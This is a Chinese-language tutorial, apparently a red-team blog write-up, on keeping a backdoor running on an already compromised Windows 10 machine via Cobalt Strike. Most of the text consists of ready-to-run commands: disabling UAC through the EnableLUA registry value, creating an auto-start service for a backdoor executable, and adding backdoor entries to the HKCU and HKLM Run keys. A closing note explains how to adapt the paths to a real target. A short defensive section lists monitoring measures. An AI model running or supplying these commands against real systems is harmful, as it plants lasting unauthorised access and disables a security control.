Windows注册表后门持久化技术详解

一、环境准备

1. 测试环境：

   • Windows 10虚拟机
   • Cobalt Strike框架（服务器部署在云上）

2. 攻击前提：

   • 已通过远程木马控制目标Windows 10虚拟机
   • 具备管理员权限

二、UAC绕过技术

通过修改注册表键值禁用UAC（用户账户控制）：

reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" EnableLUA

• EnableLUA=1：启用UAC（默认设置）
• EnableLUA=0：禁用UAC，使操作具有真正的administrators权限

修改命令：

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

三、服务创建持久化

1. 创建服务

使用sc create命令创建服务：

sc create "test" binpath= "C:\Users\calmness\Desktop\ceshi.exe"

参数说明：

• "test"：服务名称
• binpath=：后门程序路径（注意等号后需有空格）

2. 设置服务描述（可选）

sc description "test" "测试"

3. 配置服务自启动

sc config "test" start= auto

4. 启动服务

net start "test"

成功执行后，后门程序将随系统启动而自动运行。

四、注册表启动项持久化

1. 当前用户启动项

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "calm" /t REG_SZ /d "C:\Users\calmness\calmnexx.exe" /f

参数说明：

• /v "calm"：值名称
• /t REG_SZ：字符串类型
• /d：后门程序路径
• /f：强制覆盖现有项

2. 系统全局启动项（需管理员权限）

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "calm" /t REG_SZ /d "C:\Users\calmness\calmnexx.exe" /f

五、验证技术

1. 检查服务创建：

   sc query "test"
   

2. 检查注册表项：

   reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "calm"
   

3. 文件存在性检查：

   dir "C:\Users\calmness\Desktop\"
   

六、防御措施

1. 监控注册表修改：

   • 特别关注HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System和各类Run键值

2. 服务监控：

   • 定期检查系统服务，特别是描述信息异常或路径可疑的服务

3. UAC保护：

   • 保持UAC启用状态（EnableLUA=1）
   • 对UAC设置变更进行告警

4. 权限控制：

   • 限制用户对服务管理工具和注册表编辑工具的访问

5. 文件监控：

   • 对系统启动目录和常见后门存放位置进行监控

七、补充说明

1. 使用Cobalt Strike的beacon执行命令时，命令格式为：

   beacon> shell [command]
   

2. 重启验证是检验持久化有效性的重要步骤，文中提到"重启大法 依旧上线"表明技术有效。

3. 路径中的calmness应替换为实际目标系统的用户名，ceshi.exe和calmnexx.exe为后门程序名称，实际操作中需要根据情况修改。